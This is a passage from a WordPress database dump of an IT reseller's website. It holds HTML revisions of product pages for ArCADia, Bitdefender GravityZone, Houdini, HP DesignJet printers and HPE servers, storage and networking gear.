VIEWER</h3>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/10/3dviewer-1.jpg\" alt=\"\" /><h3 style=\"text-align: center;\">ArCADia-TEXT</h3><hr /><p>Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2019/10/text-2.jpg\" alt=\"\" /></p><h3 style=\"text-align: center;\">Licence Manager</h3>\n<hr />\n&nbsp;\n<center><img src=\"https://bintara.com.my/wp-content/uploads/2019/10/menadzer-lic-1.jpg\" alt=\"\" /></center>		\n		<p>To discover more, please click the button below or contact us to discuss your needs.</p><center>[maxbutton id=\"1\" ]</center>','Arcadia','','inherit','closed','closed','','3606-revision-v1','','','2019-10-01 11:36:48','2019-10-01 03:36:48','',3606,'https://bintara.com.my/blog/2019/10/01/3606-revision-v1/',0,'revision','',0),(3619,1,'2019-10-01 11:31:31','2019-10-01 03:31:31','<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h2><h3>Itâ€™s Time to Rethink Endpoint Security<br />Protect Endpoints</h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security! <br />Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.</p>		\n			<h2>Product</h2>		\n		<h3><strong>GravityZone Elite SuiteÂ </strong></h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Ultra SuiteÂ </strong></h3><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.</p><h3><strong>GravityZone Enterprise Security</strong></h3><p>Bitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.</p><h2>Protect all devices</h2><h3>Anti Ransomware</h3><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.</p><h3 id=\"products\">Products</h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.</p><h3><strong>GravityZone Elite SuiteÂ </strong></h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Security for Endpoints </strong></h3><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.</p><h3><strong>GravityZone Advanced Business Security </strong></h3><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.</p>To discover more, please click the button below or contact us to discuss your needs.\n&nbsp;\n<center>[maxbutton id=\"1\" ]</center>','Bitdefender','','inherit','closed','closed','','1448-autosave-v1','','','2019-10-01 11:31:32','2019-10-01 03:31:32','',1448,'https://bintara.com.my/blog/2019/10/01/1448-autosave-v1/',0,'revision','',0),(3621,1,'2019-10-01 12:01:29','2019-10-01 04:01:29','Houdini is built from the ground up to be a procedural system that empowers artists to work freely, create multiple iterations and rapidly share workflows with colleagues.\n<div class=\"display\">\n<h2>FLEXIBLE</h2>\n<h3>Node-based Workflow</h3>\n</div>\nIn Houdini, every action is stored in a node. These nodes are then â€œwiredâ€ into networks which define a â€œrecipeâ€ that can be tweaked to refine the outcome then repeated to create similar yet unique results. The ability for nodes to be saved and to pass information, in the form of attributes, down the chain is what gives Houdini its procedural nature.\n<h2>INTUITIVE</h2>\n<h3>Artist Friendly Tools</h3>\nWhile the nodes are what makes Houdini unique and give it power, there are lots of viewport and shelf tools that allow for artist-friendly viewport interactions. Behind the scenes, Houdini builds up the nodes and networks for you. Houdini let\'s artists explore different creative paths because it is easy to branch off a new node to explore alternative solutions.\n<div class=\"display\">\n<h2>NEXT LEVEL</h2>\n<h3>VFX &amp; Simulation</h3>\n</div>\nVisual effects artists gravitate to Houdini because its procedural workflow is ideal for creating sophisticated particle and dynamic simulations. Effects are typically designed to react to actions taking place in a shot and a procedural solution â€œautomatesâ€ these reactions providing studios with more creative control and more rapid turnaround.\n<div class=\"display\">\n<h2>DIRECTABLE</h2>\n<h3>Shots &amp; Multiple Iterations</h3>\n</div>\nHoudini lets you make creative decisions deep into production as changes made to Houdini nodes cascade through the network to create a new and unique result. This directability is retained throughout the creative process and can be used to make last minute decisions that would be too costly in a traditional CG pipeline.\n<div class=\"display\">\n<h2>POWERFUL</h2>\n<h3>Pipeline in a Box</h3>\n</div>\nWhether you are setting up a shot or building a game level, Houdini lets you create tools that can be reused many times during a projectâ€™s life cycle. Instead of simply reacting to issues and problems, you will be able to plan ahead and visualize and refine your pipeline.\n<div class=\"display\">\n<h2>ROBUST</h2>\n<h3>Asset Creation Tools</h3>\n</div>\nA big benefit of Houdiniâ€™s node-based approach is the ability to encapsulate node networks into custom nodes that are shareable. Create these digital assets without writing any code then share them with other Houdini artists.\n\nWith the Houdini Engine, open assets in other applications such as Autodesk Maya, Autodesk 3ds Max, C4D, UE4 and Unity with the assetâ€™s procedural controls available for editing in the host app.\n\n&nbsp;\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Houdini','','inherit','closed','closed','','1526-autosave-v1','','','2019-10-01 12:01:29','2019-10-01 04:01:29','',1526,'https://bintara.com.my/blog/2019/10/01/1526-autosave-v1/',0,'revision','',0),(3622,1,'2019-10-01 12:02:28','2019-10-01 04:02:28','Houdini is built from the ground up to be a procedural system that empowers artists to work freely, create multiple iterations and rapidly share workflows with colleagues.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>FLEXIBLE</h2>\r\n<h3>Node-based Workflow</h3>\r\n</div>\r\nIn Houdini, every action is stored in a node. These nodes are then â€œwiredâ€ into networks which define a â€œrecipeâ€ that can be tweaked to refine the outcome then repeated to create similar yet unique results. The ability for nodes to be saved and to pass information, in the form of attributes, down the chain is what gives Houdini its procedural nature.\r\n\r\n&nbsp;\r\n<h2>INTUITIVE</h2>\r\n<h3>Artist Friendly Tools</h3>\r\nWhile the nodes are what makes Houdini unique and give it power, there are lots of viewport and shelf tools that allow for artist-friendly viewport interactions. Behind the scenes, Houdini builds up the nodes and networks for you. Houdini let\'s artists explore different creative paths because it is easy to branch off a new node to explore alternative solutions.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>NEXT LEVEL</h2>\r\n<h3>VFX &amp; Simulation</h3>\r\n</div>\r\nVisual effects artists gravitate to Houdini because its procedural workflow is ideal for creating sophisticated particle and dynamic simulations. Effects are typically designed to react to actions taking place in a shot and a procedural solution â€œautomatesâ€ these reactions providing studios with more creative control and more rapid turnaround.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>DIRECTABLE</h2>\r\n<h3>Shots &amp; Multiple Iterations</h3>\r\n</div>\r\nHoudini lets you make creative decisions deep into production as changes made to Houdini nodes cascade through the network to create a new and unique result. This directability is retained throughout the creative process and can be used to make last minute decisions that would be too costly in a traditional CG pipeline.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>POWERFUL</h2>\r\n<h3>Pipeline in a Box</h3>\r\n</div>\r\nWhether you are setting up a shot or building a game level, Houdini lets you create tools that can be reused many times during a projectâ€™s life cycle. Instead of simply reacting to issues and problems, you will be able to plan ahead and visualize and refine your pipeline.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>ROBUST</h2>\r\n<h3>Asset Creation Tools</h3>\r\n</div>\r\nA big benefit of Houdiniâ€™s node-based approach is the ability to encapsulate node networks into custom nodes that are shareable. Create these digital assets without writing any code then share them with other Houdini artists.\r\n\r\nWith the Houdini Engine, open assets in other applications such as Autodesk Maya, Autodesk 3ds Max, C4D, UE4 and Unity with the assetâ€™s procedural controls available for editing in the host app.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Houdini','','inherit','closed','closed','','1526-revision-v1','','','2019-10-01 12:02:28','2019-10-01 04:02:28','',1526,'https://bintara.com.my/blog/2019/10/01/1526-revision-v1/',0,'revision','',0),(3626,1,'2019-10-01 12:52:15','2019-10-01 04:52:15','<h2>HP DesignJet large-format office printers</h2><p>These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg\" alt=\"\" width=\"242\" height=\"185\" /></p><h3 style=\"text-align: center;\"><strong>HP DesignJet T120 Printer</strong></h3><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg\" alt=\"\" width=\"196\" height=\"196\" /><h3 style=\"text-align: center;\"><strong>HP DesignJet T1700 Printer series</strong></h3><h2>The most affordable and compact HP DesignJet printer</h2>The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.Â <h3>Secure, empowering printer for CAD/GIS workgroups</h3>Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.Â <ul><li><strong>HP DesignJet T830 Multifunction Printer series</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\" alt=\"\" width=\"272\" height=\"181\" /></p><h3>Smart choice for evolving architect/construction offices</h3>Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.Â <h3>Â </h3><h3>HP DesignJet large-format production printers</h3>Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.Â <ul><li><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\" alt=\"\" width=\"199\" height=\"199\" /></p><h3>Productivity in full color</h3>As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.Â <ul><li><strong>HP DesignJet Z6610 Production Printer</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\" alt=\"\" width=\"240\" height=\"184\" /></p><h3>The fastest graphics production printing solution</h3>Â Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.Â <ul><li><strong>HP DesignJet Z6810 Production Printer series</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\" alt=\"\" width=\"312\" height=\"166\" /></p><h3>Meet customer high-quality expectations with the fastest production printing solution</h3><p>Consistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.</p>Â To discover more, please click the buttons below or contact us to discuss your needs.Â Â Â Â [maxbutton id=\"1\" ]','HP DesignJet large-format office printers','','inherit','closed','closed','','1528-revision-v1','','','2019-10-01 12:52:15','2019-10-01 04:52:15','',1528,'https://bintara.com.my/blog/2019/10/01/1528-revision-v1/',0,'revision','',0),(3625,1,'2019-10-01 12:19:16','2019-10-01 04:19:16','<h2 class=\"font-lh3 \">HP DesignJet large-format office printers</h2>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div><img class=\"wp-image-2502 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg\" alt=\"\" width=\"242\" height=\"185\" />\r\n<center style= \"margin: 0; padding: 0;\">HP DesignJet T120 Printer</center>\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2503\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg\" alt=\"\" width=\"196\" height=\"196\" />\r\n\r\n&nbsp;\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2504\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\" alt=\"\" width=\"272\" height=\"181\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3></h3>\r\n<h3 class=\"font-lh3 \">HP DesignJet large-format production printers</h3>\r\n<div class=\"description\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</div>\r\n</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2505\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\" alt=\"\" width=\"199\" height=\"199\" />\r\n<h3 class=\"font-lh3 \">Productivity in full color</h3>\r\n<div class=\"description\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6610 Production Printer</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2506\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\" alt=\"\" width=\"240\" height=\"184\" />\r\n<h3 class=\"font-lh3 \">The fastest graphics production printing solution</h3>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6810 Production Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2507\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\" alt=\"\" width=\"312\" height=\"166\" />\r\n<h3 class=\"font-lh3 \">Meet customer high-quality expectations with the fastest production printing solution</h3>\r\nConsistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.\r\n\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP DesignJet large-format office printers','','inherit','closed','closed','','1528-revision-v1','','','2019-10-01 12:19:16','2019-10-01 04:19:16','',1528,'https://bintara.com.my/blog/2019/10/01/1528-revision-v1/',0,'revision','',0),(3628,1,'2019-10-01 14:42:43','2019-10-01 06:42:43','<h2>HP DesignJet large-format office printers</h2><p>These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg\" alt=\"\" width=\"242\" height=\"185\" /></p><h3 style=\"text-align: center;\"><strong>HP DesignJet T120 Printer</strong></h3><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg\" alt=\"\" width=\"196\" height=\"196\" /><h3 style=\"text-align: center;\"><strong>HP DesignJet T1700 Printer series</strong></h3><h2>The most affordable and compact HP DesignJet printer</h2>The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.<h2>Secure, empowering printer for CAD/GIS workgroups</h2>Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\" alt=\"\" width=\"272\" height=\"181\" /></p><h3 style=\"text-align: center;\"><strong>HP DesignJet T830 Multifunction Printer series</strong></h3><h2 style=\"text-align: center;\">Smart choice for evolving architect/construction offices</h2>Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<h3><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\" alt=\"\" width=\"199\" height=\"199\" /></h3><h3 style=\"text-align: center;\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</h3><h2>HP DesignJet large-format production printers</h2><p>Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</p><h2>Productivity in full color</h2>As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\" alt=\"\" width=\"240\" height=\"184\" /><h3 style=\"text-align: center;\"><strong>HP DesignJet Z6610 Production Printer</strong></h3><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\" alt=\"\" width=\"312\" height=\"166\" /></p><h3 style=\"text-align: center;\"><strong>HP DesignJet Z6810 Production Printer series</strong></h3><h2>The fastest graphics production printing solution</h2>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.<h2 style=\"text-align: center;\">Meet customer high-quality expectations with the fastest production printing solution</h2><p style=\"text-align: center;\">Consistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.</p>To discover more, please click the buttons below or contact us to discuss your needs.Â [maxbutton id=\"1\" ]','HP DesignJet large-format office printers','','inherit','closed','closed','','1528-revision-v1','','','2019-10-01 14:42:43','2019-10-01 06:42:43','',1528,'https://bintara.com.my/blog/2019/10/01/1528-revision-v1/',0,'revision','',0),(3632,1,'2019-10-01 17:28:08','2019-10-01 09:28:08','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the 